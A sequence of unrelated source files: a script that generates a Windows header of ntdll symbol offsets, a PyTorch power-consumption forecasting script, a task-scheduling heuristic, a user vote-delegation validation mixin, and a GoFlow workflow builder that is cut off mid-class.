Do not edit it manually!\n') f.write('// To regenerate it, please run ' + me + '\n\n') if platform.machine().endswith('64'): f.write('// This header is generated to target 64-bit Windows including SysWoW64\n\n') else: f.write('// This header is generated to target 32-bit Windows ONLY\n\n') f.write('#pragma once\n\n') if platform.machine().endswith('64'): f.write('#ifdef _WIN64\n\n') ntdll_pdb = handle_pe("C:\\Windows\\system32\\ntdll.dll") sys.stderr.write("Loading symbols for %s...\n" % ntdll_pdb) pdb = pdbparse.parse(ntdll_pdb, fast_load = True) addrs = symbol_addresses(pdb) rva_CsrServerApiRoutine_x64 = addrs['CsrServerApiRoutine'] rva_RtlpUnloadEventTraceEx_x64 = addrs['RtlpUnloadEventTraceEx'] f.write('// RVA of CsrServerApiRoutine up to RtlpUnloadEventTraceEx in System32\\ntdll.exe\n') f.write('#define csrDataRva_x64 ' + hex(rva_CsrServerApiRoutine_x64) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx_x64) + '\n') f.write('#define csrDataSize_x64 ' + hex(rva_RtlpUnloadEventTraceEx_x64 - rva_CsrServerApiRoutine_x64) + '\n') f.write('\n') f.write('#else\n\n') ntdll_pdb = handle_pe("C:\\Windows\\SysWOW64\\ntdll.dll") sys.stderr.write("Loading symbols for %s...\n" % ntdll_pdb) pdb = pdbparse.parse(ntdll_pdb, fast_load = True) addrs = symbol_addresses(pdb) rva_CsrServerApiRoutine = addrs['_CsrServerApiRoutine'] rva_RtlpUnloadEventTraceEx = addrs['_RtlpUnloadEventTraceEx'] f.write('// WoW64 ntdll.dll\n') f.write('// RVA of _CsrServerApiRoutine up to _RtlpUnloadEventTraceEx in SysWOW64\\ntdll.dll\n') f.write('#define csrDataRva_x86 ' + hex(rva_CsrServerApiRoutine) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx) + '\n') f.write('#define csrDataSize_x86 ' + hex(rva_RtlpUnloadEventTraceEx - rva_CsrServerApiRoutine) + '\n') f.write('\n') f.write('// RVA of CsrServerApiRoutine up to RtlpUnloadEventTraceEx in System32\\ntdll.exe\n') f.write('#define csrDataRva_wow64 ' + hex(rva_CsrServerApiRoutine_x64) + 
'\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx_x64) + '\n') f.write('#define csrDataSize_wow64 ' + hex(rva_RtlpUnloadEventTraceEx_x64 - rva_CsrServerApiRoutine_x64) + '\n') f.write('\n') f.write('#endif\n') else: f.write('#ifdef WIN64\n\n') f.write('#error 64-bit csrss offsets missing; please consult ' + me + '\n') f.write('#define csrDataRva_x64 0\n') f.write('#define csrDataSize_x64 0\n') f.write('#define csrDataRva_wow64 0\n') f.write('#define csrDataSize_wow64 0\n') f.write('\n') f.write('#else\n\n') ntdll_pdb = handle_pe("C:\\Windows\\system32\\ntdll.dll") sys.stderr.write("Loading symbols for %s...\n" % ntdll_pdb) pdb = pdbparse.parse(ntdll_pdb, fast_load = True) addrs = symbol_addresses(pdb) rva_CsrServerApiRoutine = addrs['CsrServerApiRoutine'] rva_RtlpUnloadEventTraceEx = addrs['RtlpUnloadEventTraceEx'] f.write('// RVA of CsrServerApiRoutine up to RtlpUnloadEventTraceEx in System32\\ntdll.exe\n') f.write('#define csrDataRva_x86 ' + hex(rva_CsrServerApiRoutine) + '\n') f.write('// RtlpUnloadEventTraceEx = ' + hex(rva_RtlpUnloadEventTraceEx) + '\n') f.write('#define csrDataSize_x86 ' + hex(rva_RtlpUnloadEventTraceEx - rva_CsrServerApiRoutine) + '\n') f.write('\n') f.write('// WoW64 not supported on native 32-bit platform\n') f.write('#define csrDataRva_wow64 0\n') f.write('#define csrDataSize_wow64 0\n') f.write('\n') f.write('#endif\n') f.close() print 'Successfully generated ' + genfile if __name__ == "__main__": main()
import pickle
from optparse import OptionParser
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
from numpy.core.fromnumeric import mean
import pandas as pd
import torch
import torch.optim as optim
import torch.nn as nn
from sklearn.preprocessing import StandardScaler
from symp_extract.consts import include_cols
import dgl
from functools import reduce

from models.utils import device, float_tensor, long_tensor
from models.multimodels import (
    EmbedEncoder,
    GRUEncoder,
    EmbGCNEncoder,
    LatentEncoder,
    CorrEncoder,
    Decoder,
)

parser = OptionParser()
parser.add_option("-w", "--week", dest="week_ahead", type="int", default=2)
parser.add_option("-y", "--year", dest="year", type="int", default=2020)
parser.add_option("-n", "--num", dest="num", type="string")
parser.add_option("-e", "--epoch", dest="epochs", type="int", default="1500")
(options, args) = parser.parse_args()

# UCI household power consumption dataset: semicolon-separated, first
# line is the header, columns are Date;Time;Global_active_power;...
with open("./data/household_power_consumption/household_power_consumption.txt", "r") as f:
    data = f.readlines()
data = [d.strip().split(";") for d in data][1:]


def get_month(ss: str) -> int:
    """Extract the 0-based month from a 'd/m/yyyy' date string."""
    # Equivalent to the original slice arithmetic, but readable.
    return int(ss.split("/")[1]) - 1


def get_time_of_day(ss: str) -> int:
    """Bucket an 'hh:mm:ss' time string into one of four 6-hour slots."""
    hour = int(ss[:2])
    if hour < 6:
        return 0
    elif hour < 12:
        return 1
    elif hour < 18:
        return 2
    else:
        return 3


tod = np.array([get_time_of_day(d[1]) for d in data], dtype=np.int32)
month = np.array([get_month(d[0]) for d in data], dtype=np.int32)

# Numeric feature matrix; the dataset marks missing values with '?',
# which we map to 0.0.
features = []
for d in data:
    f = []
    for x in d[2:]:
        try:
            f.append(float(x))
        except ValueError:
            f.append(0.0)
    features.append(f)
features = np.array(features)

target = features[:, 0]  # predict Global_active_power (first numeric column)
total_time = len(data)
test_start = int(total_time * 0.8)  # 80/20 chronological train/test split


def sample_train(n_samples, window=20):
    """Sample `n_samples` random training windows from the train split.

    Returns (X, X_symp, Y, mt, reg): target history of length `window`,
    full feature history, next-step target, and the month / time-of-day
    ids at the prediction step.
    """
    X, X_symp, Y, mt, reg = [], [], [], [], []
    # Fix: bound by test_start - window so the window (and its target at
    # start_seq + window) stays inside the training region; the original
    # bound of test_start let windows leak into the test split.
    start_seqs = np.random.randint(0, test_start - window, n_samples)
    for start_seq in start_seqs:
        X.append(target[start_seq:start_seq + window, np.newaxis])
        X_symp.append(features[start_seq:start_seq + window])
        Y.append(target[start_seq + window])
        mt.append(month[start_seq + window])
        reg.append(tod[start_seq + window])
    return np.array(X), np.array(X_symp), np.array(Y), np.array(mt), np.array(reg)


def sample_test(n_samples, window=20):
    """Sample `n_samples` random evaluation windows from the test split."""
    X, X_symp, Y, mt, reg = [], [], [], [], []
    # Fix: bound by total_time - window; the original bound of total_time
    # could index target[start_seq + window] past the end (IndexError).
    start_seqs = np.random.randint(test_start, total_time - window, n_samples)
    for start_seq in start_seqs:
        X.append(target[start_seq:start_seq + window, np.newaxis])
        X_symp.append(features[start_seq:start_seq + window])
        Y.append(target[start_seq + window])
        mt.append(month[start_seq + window])
        reg.append(tod[start_seq + window])
    return np.array(X), np.array(X_symp), np.array(Y), np.array(mt), np.array(reg)


# Reference points: `splits` equal chunks of the training region,
# truncated to their first 100 steps each.
splits = 10
len_seq = test_start // splits
seq_references = np.array(
    [features[i: i + len_seq, 0, np.newaxis] for i in range(0, test_start, len_seq)]
)[:, :100, :]
symp_references = np.array(
    [features[i: i + len_seq] for i in range(0, test_start, len_seq)]
)[:, :100, :]
month_references = np.arange(12)
reg_references = np.arange(4)

train_seqs, train_symp_seqs, train_y, mt, reg = sample_train(100)

# One encoder per view (month embedding, target sequence, full feature
# sequence, time-of-day embedding) plus a stochastic latent head each.
month_enc = EmbedEncoder(in_size=12, out_dim=60).to(device)
seq_encoder = GRUEncoder(in_size=1, out_dim=60).to(device)
symp_encoder = GRUEncoder(in_size=7, out_dim=60).to(device)
reg_encoder = EmbedEncoder(in_size=5, out_dim=60).to(device)

stoch_month_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device)
stoch_seq_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device)
stoch_symp_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device)
stoch_reg_enc = LatentEncoder(in_dim=60, hidden_layers=[60], out_dim=60).to(device)

month_corr = CorrEncoder(
    in_data_dim=60,
    in_data_det_dim=60,
    in_ref_dim=60,
    in_ref_det_dim=60,
    hidden_dim=60,
    q_layers=2,
    same_decoder=True,
).to(device)
seq_corr = CorrEncoder(
    in_data_dim=60,
    in_data_det_dim=60,
    in_ref_dim=60,
    in_ref_det_dim=60,
    hidden_dim=60,
    q_layers=2,
    same_decoder=True,
).to(device)
symp_corr = CorrEncoder(
    in_data_dim=60,
    in_data_det_dim=60,
    in_ref_dim=60,
    in_ref_det_dim=60,
    hidden_dim=60,
    q_layers=2,
    same_decoder=True,
).to(device)
reg_corr = CorrEncoder(
    in_data_dim=60,
    in_data_det_dim=60,
    in_ref_dim=60,
    in_ref_det_dim=60,
    hidden_dim=60,
    q_layers=2,
    same_decoder=True,
).to(device)

decoder = Decoder(z_dim=60, sr_dim=60, latent_dim=60, hidden_dim=60, y_dim=1).to(device)

models = [
    month_enc,
    seq_encoder,
    symp_encoder,
    reg_encoder,
    stoch_month_enc,
    stoch_seq_enc,
    stoch_symp_enc,
    stoch_reg_enc,
    month_corr,
    seq_corr,
    symp_corr,
    reg_corr,
    decoder,
]

# One optimizer over the concatenated parameter lists of all submodels.
opt = optim.Adam(
    reduce(lambda x, y: x + y, [list(m.parameters()) for m in models]), lr=1e-3
)


def train(train_seqs, train_symp_seqs, reg, mt, train_y):
    """Run one optimizer step on a sampled batch.

    Returns (predictions, total_loss, decoder_loss) as numpy values.
    """
    for m in models:
        m.train()
    opt.zero_grad()

    # Probabilistic encode of reference points
    ref_months = month_enc.forward(long_tensor(month_references))
    ref_seq = seq_encoder.forward(float_tensor(seq_references))
    ref_symp = symp_encoder.forward(float_tensor(symp_references))
    ref_reg = reg_encoder.forward(long_tensor(reg_references))

    stoch_ref_months = stoch_month_enc.forward(ref_months)[0]
    stoch_ref_seq = stoch_seq_enc.forward(ref_seq)[0]
    stoch_ref_symp = stoch_symp_enc.forward(ref_symp)[0]
    stoch_ref_reg = stoch_reg_enc.forward(ref_reg)[0]

    # Probabilistic encode of training points
    train_months = month_enc.forward(long_tensor(mt.astype(int)))
    train_seq = seq_encoder.forward(float_tensor(train_seqs))
    train_symp = symp_encoder.forward(float_tensor(train_symp_seqs))
    train_reg = reg_encoder.forward(long_tensor(reg.astype(int)))

    stoch_train_months = stoch_month_enc.forward(train_months)[0]
    stoch_train_seq = stoch_seq_enc.forward(train_seq)[0]
    stoch_train_symp = stoch_symp_enc.forward(train_symp)[0]
    stoch_train_reg = stoch_reg_enc.forward(train_reg)[0]

    # View-aware latent embeddings plus a per-view regularization loss.
    train_months_z, train_month_sr, _, month_loss, _ = month_corr.forward(
        stoch_ref_months, stoch_train_months, ref_months, train_months
    )
    train_seq_z, train_seq_sr, _, seq_loss, _ = seq_corr.forward(
        stoch_ref_seq, stoch_train_seq, ref_seq, train_seq
    )
    train_symp_z, train_symp_sr, _, symp_loss, _ = symp_corr.forward(
        stoch_ref_symp, stoch_train_symp, ref_symp, train_symp
    )
    train_reg_z, train_reg_sr, _, reg_loss, _ = reg_corr.forward(
        stoch_ref_reg, stoch_train_reg, ref_reg, train_reg
    )

    # Stack all view embeddings and decode to the next-step target.
    train_z = torch.stack(
        [train_months_z, train_seq_z, train_symp_z, train_reg_z], dim=1
    )
    train_sr = torch.stack(
        [train_month_sr, train_seq_sr, train_symp_sr, train_reg_sr], dim=1
    )

    loss, mean_y, _, _ = decoder.forward(
        train_z, train_sr, train_seq, float_tensor(train_y)[:, None]
    )

    losses = month_loss + seq_loss + symp_loss + reg_loss + loss
    losses.backward()
    opt.step()
    print(f"Loss = {loss.detach().cpu().numpy()}")
    return (
        mean_y.detach().cpu().numpy(),
        losses.detach().cpu().numpy(),
        loss.detach().cpu().numpy(),
    )


def evaluate(test_seqs, test_symp_seqs, reg_test, mt_test, test_y, sample=True):
    """Evaluate on a sampled test batch; returns (rmse, mean_y, sample_y)."""
    for m in models:
        m.eval()

    # No gradients needed at evaluation time.
    with torch.no_grad():
        # Probabilistic encode of reference points
        ref_months = month_enc.forward(long_tensor(month_references))
        ref_seq = seq_encoder.forward(float_tensor(seq_references))
        ref_symp = symp_encoder.forward(float_tensor(symp_references))
        ref_reg = reg_encoder.forward(long_tensor(reg_references))

        stoch_ref_months = stoch_month_enc.forward(ref_months)[0]
        stoch_ref_seq = stoch_seq_enc.forward(ref_seq)[0]
        stoch_ref_symp = stoch_symp_enc.forward(ref_symp)[0]
        stoch_ref_reg = stoch_reg_enc.forward(ref_reg)[0]

        # Probabilistic encode of test points
        test_months = month_enc.forward(long_tensor(mt_test.astype(int)))
        test_seq = seq_encoder.forward(float_tensor(test_seqs))
        test_symp = symp_encoder.forward(float_tensor(test_symp_seqs))
        test_reg = reg_encoder.forward(long_tensor(reg_test.astype(int)))

        stoch_test_months = stoch_month_enc.forward(test_months)[0]
        stoch_test_seq = stoch_seq_enc.forward(test_seq)[0]
        stoch_test_symp = stoch_symp_enc.forward(test_symp)[0]
        stoch_test_reg = stoch_reg_enc.forward(test_reg)[0]

        # View-aware latent embeddings (predict path: no training losses).
        test_months_z, test_month_sr, _, _, _, _ = month_corr.predict(
            stoch_ref_months, stoch_test_months, ref_months, test_months
        )
        test_seq_z, test_seq_sr, _, _, _, _ = seq_corr.predict(
            stoch_ref_seq, stoch_test_seq, ref_seq, test_seq
        )
        test_symp_z, test_symp_sr, _, _, _, _ = symp_corr.predict(
            stoch_ref_symp, stoch_test_symp, ref_symp, test_symp
        )
        test_reg_z, test_reg_sr, _, _, _, _ = reg_corr.predict(
            stoch_ref_reg, stoch_test_reg, ref_reg, test_reg
        )

        test_z = torch.stack(
            [test_months_z, test_seq_z, test_symp_z, test_reg_z], dim=1
        )
        test_sr = torch.stack(
            [test_month_sr, test_seq_sr, test_symp_sr, test_reg_sr], dim=1
        )

        sample_y, mean_y, _, _ = decoder.predict(
            test_z, test_sr, test_seq, sample=sample
        )

    sample_y = sample_y.detach().cpu().numpy().ravel()
    mean_y = mean_y.detach().cpu().numpy().ravel()

    # RMSE of the sampled prediction against the ground truth.
    rmse = np.sqrt(np.mean((sample_y - test_y.ravel()) ** 2))
    print(f"RMSE = {rmse}")
    return rmse, mean_y, sample_y


# TODO(review): the epoch count is hard-coded; options.epochs (default
# 1500) is parsed above but never used.
for ep in range(1, 1000 + 1):
    train_seqs, train_symp_seqs, train_y, mt, reg = sample_train(100)
    train(train_seqs, train_symp_seqs, reg, mt, train_y)
    if ep % 10 == 0:
        print("Evaluating")
        test_seqs, test_symp_seqs, test_y, mt_test, reg_test = sample_test(100)
        evaluate(test_seqs, test_symp_seqs, reg_test, mt_test, test_y)
import sys
from random import shuffle
from heapq import heappush, heappop, heapify

cin = sys.stdin
cout = sys.stdout

def find_schedule(graph, p, ls):
    """List-schedule the n tasks onto p processors in priority order `ls`;
    returns (schedule, makespan).

    NOTE(review): relies on the module-level globals `succ`, `pred`, `n`
    and `time` (assigned below, before the first call) rather than on the
    `graph` parameter — confirm before reusing this function elsewhere.
    """
    schedule = [[] for i in range(p)]
    child = succ
    parent = pred
    # n = len(time)
    done = [False]*n          # task already scheduled?
    end_time = [-1]*n         # completion time of each scheduled task (-1 = not yet)
    donect=0
    # Min-heap of (time-processor-becomes-free, processor id).
    heap = [(0,i) for i in range(p)]
    heapify(heap)
    while donect < n:
        item = heappop(heap)
        tproc = item[0]
        proc = item[1]
        # Find the first unscheduled task in priority order whose parents
        # have all finished by time tproc.
        lefttask = -1
        for i in range(n):
            task=ls[i]
            if done[task]:
                continue
            flag=True
            for par in parent[task]:
                if end_time[par]<0 or end_time[par]>tproc:
                    flag=False
                    break
            if flag:
                lefttask=task
                break
        if lefttask!=-1:
            # Run the task on this processor; it becomes free at tproc + duration.
            heappush(heap,(tproc+time[lefttask],proc))
            schedule[proc].append(lefttask)
            donect+=1
            done[lefttask]=True
            end_time[lefttask]=tproc+time[lefttask]
        else:
            # No runnable task at tproc: advance every processor idle at
            # tproc to the next pending event time (or tproc+1 if none).
            tmp = []
            while heap and heap[0][0]==tproc:
                tmp.append(heappop(heap))
            if(heap):
                new_time = heap[0][0]
            else:
                new_time = tproc+1
            while tmp:
                heappush(heap,(new_time,(tmp.pop())[1]))
            heappush(heap,(new_time,proc))
    # Makespan = the latest time any processor becomes free.
    mtime = max(elem[0] for elem in heap)
    return schedule,mtime

def finish_time(graph,schedule,time):
    """Recompute the makespan of `schedule` from scratch (used to cross-check
    the value returned by find_schedule).

    Uses an iterative DFS with time_tasks as a visited/result marker:
    -1 = unvisited, 0 = on stack, >0 = finish time computed.
    NOTE(review): reads the globals `n` and `parent` set below.
    """
    # pos[task] = (processor index, position on that processor).
    pos = [(-1,-1) for i in range(n)]
    for i in range(len(schedule)) :
        for j in range(len(schedule[i])) :
            pos[schedule[i][j]]=(i,j)
    for elem in pos :
        assert elem!=(-1,-1)
    time_tasks = [-1]*n
    for i in range(n):
        if time_tasks[i]==-1:
            S = []
            S.append(i)
            while S :
                task = S[-1]
                x,y = pos[task]
                # Predecessor on the same processor (must finish first), if any.
                ptask = schedule[x][y-1] if y else -1
                if time_tasks[task]!=-1:
                    # Second visit: all dependencies resolved; finalize.
                    S.pop()
                    min_par = max([time_tasks[par] for par in parent[task]] or [0])
                    minimum = min_par if y==0 else max(min_par,time_tasks[ptask])
                    time_tasks[task] = time[task]+minimum
                else:
                    # First visit: mark on-stack, push unresolved dependencies.
                    time_tasks[task]=0
                    if y:
                        S.append(ptask)
                    for par in parent[task]:
                        if time_tasks[par]==-1 and par!=ptask:
                            S.append(par)
    return max(time_tasks)

def sanity_check(schedule,num_tasks,res_time):
    """Assert that `schedule` covers every task exactly once, respects the
    precedence constraints within each processor queue, and has makespan
    `res_time` (as recomputed by finish_time)."""
    sm = sum(len(processor) for processor in schedule)
    assert sm==num_tasks
    pos = [(-1,-1) for i in range(num_tasks)]
    for i in range(len(schedule)) :
        for j in range(len(schedule[i])) :
            pos[schedule[i][j]]=(i,j)
    for elem in pos :
        assert elem!=(-1,-1)
    # No task may appear after one of its successors on the same processor.
    for proc in schedule:
        for i in range(0,len(proc)):
            task = proc[i]
            pari = pred[task]
            for j in range(i+1,len(proc)):
                task2 = proc[j]
                assert task2 not in pari
    assert finish_time(graph,schedule,time)==res_time

# ---- Input: "num_tasks num_edges num_proc", task durations, then edges ----
num_tasks,num_edges,num_proc, = map(int,cin.readline().split(' '))
time = list(map(int,cin.readline().split(' ')))
n=len(time)
assert n==num_tasks
graph=[[0 for j in range(n)] for i in range(n)]
pred = [[] for i in range(n)]
succ = [[] for i in range(n)]
for i in range(num_edges):
    a,b = map(int,cin.readline().split(' '))
    graph[a][b]=1
# Transitive closure (Floyd-Warshall style)...
for k in range(n):
    for i in range(n):
        for j in range(n):
            if graph[i][k] and graph[k][j] :
                graph[i][j]=1
# ...then transitive reduction: drop i->k when an i->j->k path exists.
for i in range(n):
    for j in range(n):
        if graph[i][j] :
            for k in range(n):
                if graph[j][k]:
                    graph[i][k]=0
for i in range(n):
    for j in range(n):
        if graph[i][j]:
            succ[i].append(j)
            pred[j].append(i)
parent=pred
child=succ

## Heuristic 1: increasing order of task duration
ls = [(time[i],i) for i in range(n)]
ls.sort(key=lambda x:x[0],reverse=False)
ls2=[]
for i in range(len(ls)):
    ls2.append(ls[i][1])
ls=ls2
result = find_schedule(graph,num_proc,ls)
schedule = result[0]
bestschedule=schedule
besttime=result[1]
worstschedule=schedule
worsttime=result[1]

## Heuristic 2: decreasing order of task duration
ls = [(time[i],i) for i in range(n)]
ls.sort(key=lambda x:x[0],reverse=True)
ls2=[]
for i in range(len(ls)):
    ls2.append(ls[i][1])
ls=ls2
result = find_schedule(graph,num_proc,ls)
schedule = result[0]
if(result[1]<besttime):
    besttime=result[1]
    bestschedule=schedule
if(result[1]>worsttime):
    worsttime=result[1]
    worstschedule=schedule

## Heuristic 3: random priority permutations (40*n trials)
lim=40*n
ls = [i for i in range(n)]
shuffle(ls)
for i in range(lim):
    shuffle(ls)
    result = find_schedule(graph,num_proc,ls)
    schedule = result[0]
    if(result[1]<besttime):
        besttime=result[1]
        bestschedule=schedule
    if(result[1]>worsttime):
        worsttime=result[1]
        worstschedule=schedule
sanity_check(bestschedule,num_tasks,besttime)
sanity_check(worstschedule,num_tasks,worsttime)
cout.write(str(besttime)+",")
cout.write(str(worsttime)+",")

## Heuristic 4: randomized topological-order permutations (4*n trials)
roots=[]
for i in range(n):
    if(pred[i]==[]):
        roots.append(i)
bs=[]
bt=1000000000
wt=0
ws=[]
lim=4*n
numroots=len(roots)
# permute roots lim times
for num in range(lim):
    shuffle(roots)
    topo=[]
    tk=0
    taken=[0 for i in range(n)]
    for i in range(numroots):
        topo.append(roots[i])
        taken[roots[i]]=1
        tk+=1
    while(tk<n):
        # Candidates: tasks whose predecessors are all already placed.
        poss=[]
        for i in range(n):
            if taken[i]==1:
                continue
            temp=0
            for j in pred[i]:
                if(taken[j]==1):
                    temp+=1
            if(temp==len(pred[i])):
                poss.append(i)
        # Rank candidates by how far back their parents sit in `topo`
        # (larger distances first) and take the top one.
        order=[]
        lenp=len(poss)
        for i in range(lenp):
            a=poss[i]
            mind=-1
            distances=[]
            for j in range(len(topo)):
                if(topo[j] in pred[a]):
                    mind=max(mind,j)
                    distances.append(len(topo)-j)
            distances.sort()
            order.append((distances,poss[i]))
        order.sort(reverse=True)
        take=order[0][1]
        topo.append(take)
        taken[take]=1
        tk+=1
    result = find_schedule(graph,num_proc,topo)
    schedule = result[0]
    if(result[1]<bt):
        bt=result[1]
        bs=schedule
sanity_check(bs,num_tasks,bt)
cout.write(str(bt)+"\n")
from collections import defaultdict
from functools import reduce
from typing import Any, Dict, List

from ....services.datastore.commands import GetManyRequest
from ....shared.exceptions import ActionException
from ....shared.filters import FilterOperator
from ....shared.patterns import Collection, FullQualifiedId
from ...action import Action
from ...util.assert_belongs_to_meeting import assert_belongs_to_meeting


class UserMixin(Action):
    """Shared validation for user create/update actions: username
    uniqueness, existence and consistency of vote-delegation targets,
    and meeting membership of all referenced users."""

    def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
        """Validate *instance* and return it unchanged on success.

        Raises ActionException on duplicate/blank username or on any
        inconsistent vote delegation.
        """
        instance = super().update_instance(instance)
        user_fqid = FullQualifiedId(Collection("user"), instance["id"])
        if "username" in instance:
            # Username must be unique across all users (a hit on the
            # instance's own id is allowed).
            result = self.datastore.filter(
                Collection("user"),
                FilterOperator("username", "=", instance["username"]),
                ["id"],
            )
            if result and instance["id"] not in result.keys():
                raise ActionException(
                    f"A user with the username {instance['username']} already exists."
                )
        self.check_existence_of_to_and_from_users(instance)
        self.check_meeting_and_users(instance, user_fqid)
        if "vote_delegated_$_to_id" in instance:
            self.check_vote_delegated__to_id(instance, user_fqid)
        if "vote_delegations_$_from_ids" in instance:
            self.check_vote_delegations__from_ids(instance, user_fqid)
        # An empty / whitespace-only username is rejected.
        if "username" in instance and not instance["username"].strip():
            raise ActionException("This username is forbidden.")
        return instance

    def check_vote_delegated__to_id(
        self, instance: Dict[str, Any], user_fqid: FullQualifiedId
    ) -> None:
        """Validate per-meeting 'delegate my vote to X' entries.

        Forbids self-delegation, delegating while already receiving
        delegations, and delegating to a user who has himself delegated.
        """
        mapped_fields = [
            f"vote_delegations_${meeting_id}_from_ids"
            for meeting_id, delegated_to in instance["vote_delegated_$_to_id"].items()
            if delegated_to
        ]
        if not mapped_fields:
            return
        user_self = self.datastore.fetch_model(
            user_fqid, mapped_fields, exception=False
        )
        if "vote_delegations_$_from_ids" in instance:
            # Values from the same request shadow the stored state.
            update_dict = {
                f"vote_delegations_${meeting_id}_from_ids": delegated_from
                for meeting_id, delegated_from in instance[
                    "vote_delegations_$_from_ids"
                ].items()
            }
            user_self.update(update_dict)
        for meeting_id, delegated_to_id in instance["vote_delegated_$_to_id"].items():
            if user_fqid.id == delegated_to_id:
                raise ActionException(
                    f"User {delegated_to_id} can't delegate the vote to himself."
                )
            if user_self.get(f"vote_delegations_${meeting_id}_from_ids"):
                raise ActionException(
                    f"User {user_fqid.id} cannot delegate his vote, because there are votes delegated to him."
                )
            mapped_field = f"vote_delegated_${meeting_id}_to_id"
            user_delegated_to = self.datastore.fetch_model(
                FullQualifiedId(Collection("user"), delegated_to_id),
                [mapped_field],
            )
            if user_delegated_to.get(mapped_field):
                raise ActionException(
                    f"User {user_fqid.id} cannot delegate his vote to user {delegated_to_id}, because that user has delegated his vote himself."
                )

    def check_vote_delegations__from_ids(
        self, instance: Dict[str, Any], user_fqid: FullQualifiedId
    ) -> None:
        """Validate per-meeting 'users delegating their votes to me' lists.

        Forbids self-delegation, receiving delegations while having
        delegated one's own vote, and receiving from users who themselves
        receive delegations.
        """
        mapped_fields = [
            f"vote_delegated_${meeting_id}_to_id"
            for meeting_id, delegated_from in instance[
                "vote_delegations_$_from_ids"
            ].items()
            if delegated_from
        ]
        if not mapped_fields:
            return
        user_self = self.datastore.fetch_model(
            user_fqid, mapped_fields, exception=False
        )
        if "vote_delegated_$_to_id" in instance:
            # Values from the same request shadow the stored state.
            update_dict = {
                f"vote_delegated_${meeting_id}_to_id": delegated_to
                for meeting_id, delegated_to in instance[
                    "vote_delegated_$_to_id"
                ].items()
            }
            user_self.update(update_dict)
        for meeting_id, delegated_from_ids in instance[
            "vote_delegations_$_from_ids"
        ].items():
            if user_fqid.id in delegated_from_ids:
                raise ActionException(
                    f"User {user_fqid.id} can't delegate the vote to himself."
                )
            if user_self.get(f"vote_delegated_${meeting_id}_to_id"):
                raise ActionException(
                    f"User {user_fqid.id} cannot receive vote delegations, because he delegated his own vote."
                )
            # Collect every offending delegator before raising so the
            # error message lists them all at once.
            mapped_field = f"vote_delegations_${meeting_id}_from_ids"
            error_user_ids: List[int] = []
            for user_id in delegated_from_ids:
                user = self.datastore.fetch_model(
                    FullQualifiedId(Collection("user"), user_id),
                    [mapped_field],
                )
                if user.get(mapped_field):
                    error_user_ids.append(user_id)
            if error_user_ids:
                raise ActionException(
                    f"User(s) {error_user_ids} can't delegate their votes because they receive vote delegations."
                )

    def check_existence_of_to_and_from_users(self, instance: Dict[str, Any]) -> None:
        """Raise ActionException if any user id referenced in the
        delegation fields does not exist in the datastore."""
        user_ids = set(
            filter(bool, instance.get("vote_delegated_$_to_id", dict()).values())
        )
        if "vote_delegations_$_from_ids" in instance:
            # Flatten the per-meeting id lists into the id set.
            user_ids = user_ids.union(
                set(
                    reduce(
                        (lambda x, y: x + y),  # type: ignore
                        instance["vote_delegations_$_from_ids"].values(),
                        [],
                    )
                )
            )
        if user_ids:
            get_many_request = GetManyRequest(
                self.model.collection, list(user_ids), ["id"]
            )
            gm_result = self.datastore.get_many([get_many_request])
            users = gm_result.get(self.model.collection, {})
            set_action_data = user_ids
            diff = set_action_data.difference(users.keys())
            if len(diff):
                raise ActionException(f"The following users were not found: {diff}")

    def check_meeting_and_users(
        self, instance: Dict[str, Any], user_fqid: FullQualifiedId
    ) -> None:
        """Assert that every user touched by a delegation belongs to the
        meeting the delegation refers to.

        Also mirrors group/meeting fields from *instance* into the
        datastore's additional models so the membership check below sees
        the values of the current request.
        """
        user_collection = Collection("user")
        # meeting_id -> FQIDs of all users referenced for that meeting.
        meeting_users = defaultdict(list)
        if instance.get("group_$_ids") is not None:
            self.datastore.update_additional_models(
                user_fqid,
                {
                    **{
                        f"group_${meeting_id}_ids": ids
                        for meeting_id, ids in instance.get("group_$_ids", {}).items()
                    },
                    "meeting_ids": [
                        int(id) for id in instance.get("group_$_ids", {}).keys()
                    ],
                },
            )
        if instance.get("meeting_id") is not None:
            self.datastore.update_additional_models(
                user_fqid, {"meeting_id": instance.get("meeting_id")}
            )
        for meeting_id, user_id in instance.get("vote_delegated_$_to_id", {}).items():
            if user_id:
                meeting_users[meeting_id].append(
                    FullQualifiedId(user_collection, user_id)
                )
        for meeting_id, user_ids in instance.get(
            "vote_delegations_$_from_ids", {}
        ).items():
            if user_ids:
                meeting_users[meeting_id].extend(
                    [FullQualifiedId(user_collection, user_id) for user_id in user_ids]
                )
        for meeting_id, users in meeting_users.items():
            # The edited user himself must belong to the meeting too.
            users.append(user_fqid)
            assert_belongs_to_meeting(self.datastore, users, int(meeting_id))
import django.db.models
from goflow.workflow.models import *

# Module-wide switch for the chatty builder log below.
DEBUG = True


def log(section, variable):
    """Print one progress line per created object when DEBUG is on."""
    if DEBUG:
        print('adding [%s] %s' % (section, variable))


# ------------------------------------------------------------------------------------
# a class based Process Builder for GoFlow
# ------------------------------------------------------------------------------------

class ProcessBuilder(object):
    """Programmatic builder for a GoFlow workflow process.

    Creates the Process, its role/group, activities, transitions, users and
    roles, keeping them in local dicts so later calls can refer to them by
    name. Call ``setup_all()`` last to wire begin/end activities.
    """

    def __init__(self, title='', description='', enabled=True, priority=0,
                 start_activity='begin', end_activity='end'):
        self.process = self.create_process(title=title, description=description,
                                           enabled=enabled, priority=priority)
        self.process_role = self.create_process_role()
        self.start_activity = start_activity
        self.end_activity = end_activity
        # Name -> object registries used by the add_* methods below.
        self.users = {}
        self.roles = {}
        self.applications = {}
        self.activities = {}
        self.transitions = {}

    def add_application(self, url='', suffix='w'):
        """Create and save an Application record."""
        app = Application(url=url, suffix=suffix)
        log('application', app)
        app.save()
        return app

    def add_applications(self, applications):
        """Register the application config mapping used by add_activities."""
        self.applications = applications

    def add_pushapp(self, url=None):
        """Get or create a PushApplication by url; returns None for no url."""
        if url:
            pushapp, new = PushApplication.objects.get_or_create(url=url)
            if new:
                pushapp.save()
            return pushapp
        else:
            return

    def add_activity(self, title='', description='', kind='standard',
